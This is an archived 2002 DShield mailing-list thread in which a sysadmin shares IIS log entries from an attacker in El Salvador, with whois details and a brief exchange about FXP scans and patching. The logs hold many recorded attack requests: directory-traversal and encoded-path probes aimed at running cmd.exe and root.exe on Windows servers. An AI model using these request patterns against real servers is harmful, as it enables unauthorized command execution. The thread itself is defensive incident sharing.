[Dshield] Web server attempt

Sue Young smy at gcmlp.com
Tue Jul 2 20:02:30 GMT 2002


Luckily no 200's.  I don't run ftp or smtp on my web servers and I keep them
patched.

Sue Young


-----Original Message-----
From: Gasper, Rick [mailto:rjgasper at kings.edu] 
Sent: Tuesday, July 02, 2002 11:39 AM
To: list at dshield.org
Subject: RE: [Dshield] Web server attempt


There has been an increase of FXP type of scans. IIS seems to be vulnerable.
Are you running IIS?

Basically they set up a FTP server to FTP server file transfer. Make sure
you don't see a successful log entry result of 200 (I think) that would mean
your server has been compromised.

Rick Gasper
Manager of Network Services
King's College 
Wilkes-Barre PA 18711
Phone: 570-208-5845
Fax: 570-208-5989
rjgasper at kings.edu


-----Original Message-----
From: Sue Young [mailto:smy at gcmlp.com] 
Sent: Tuesday, July 02, 2002 10:43 AM
To: 'list at dshield.org'
Subject: [Dshield] Web server attempt

This is the first time I've ever gotten hit from El Salvador -  This guy is
still hitting my web server today.  This is just a sample:

2002-07-01 22:39:02 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe
/c+dir 404 - 2002-07-01 22:39:11 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/MSADC/root.exe /c+dir 404 - 2002-07-01 22:39:13 63.81.37.110 -
xxx.xxx.xxx.xxx 80 GET /c/winnt/system32/cmd.exe /c+dir 404 - 2002-07-01
22:39:15 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe
/c+dir 404 - 2002-07-01 22:39:18 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2002-07-01 22:39:23
63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 22:39:25 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
2002-07-01 22:39:30 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á
../..Á
../..Á
../winnt/system32/cmd.exe
/c+dir 500 -
2002-07-01 22:39:35 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 500 - 2002-07-01 22:39:37
63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/winnt/system32/cmd.exe /c+dir
404 - 2002-07-01 22:39:39 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 404 - 2002-07-01 22:39:44 63.81.37.110 -
xxx.xxx.xxx.xxx 80 GET /winnt/system32/cmd.exe /c+dir 404 - 2002-07-01
22:39:47 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2002-07-01 22:39:49
63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2002-07-01 22:39:54
63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2002-07-01 22:39:56
63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 - 2002-07-01 23:11:16
63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /scripts/root.exe /c+dir 404 -
2002-07-01 23:11:22 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe
/c+dir 404 - 2002-07-01 23:11:27 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 - 2002-07-01 23:11:30 63.81.37.110 -
xxx.xxx.xxx.xxx 80 GET /d/winnt/system32/cmd.exe /c+dir 404 - 2002-07-01
23:11:36 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2002-07-01 23:11:41
63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-07-01 23:11:43 63.81.37.110 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 

Telefonica El Salvador (NETBLK-UU-63-81-36)
   65 Avenida Norte # 163
   Colonia Escalon, San Salvador SLV 
   SV

   Netname: UU-63-81-36
   Netblock: 63.81.36.0 - 63.81.39.255
   Maintainer: TDES

   Coordinator:
      IP TELCA, NOC Red  (SD176-ARIN)  noc.redip at telefonica.com.sv
      503-275-8550 (FAX) 503-275-6530


Sue Young
Grosvenor Capital Management

_______________________________________________
Dshield mailing list
Dshield at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list

_______________________________________________
Dshield mailing list
Dshield at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list




More information about the list mailing list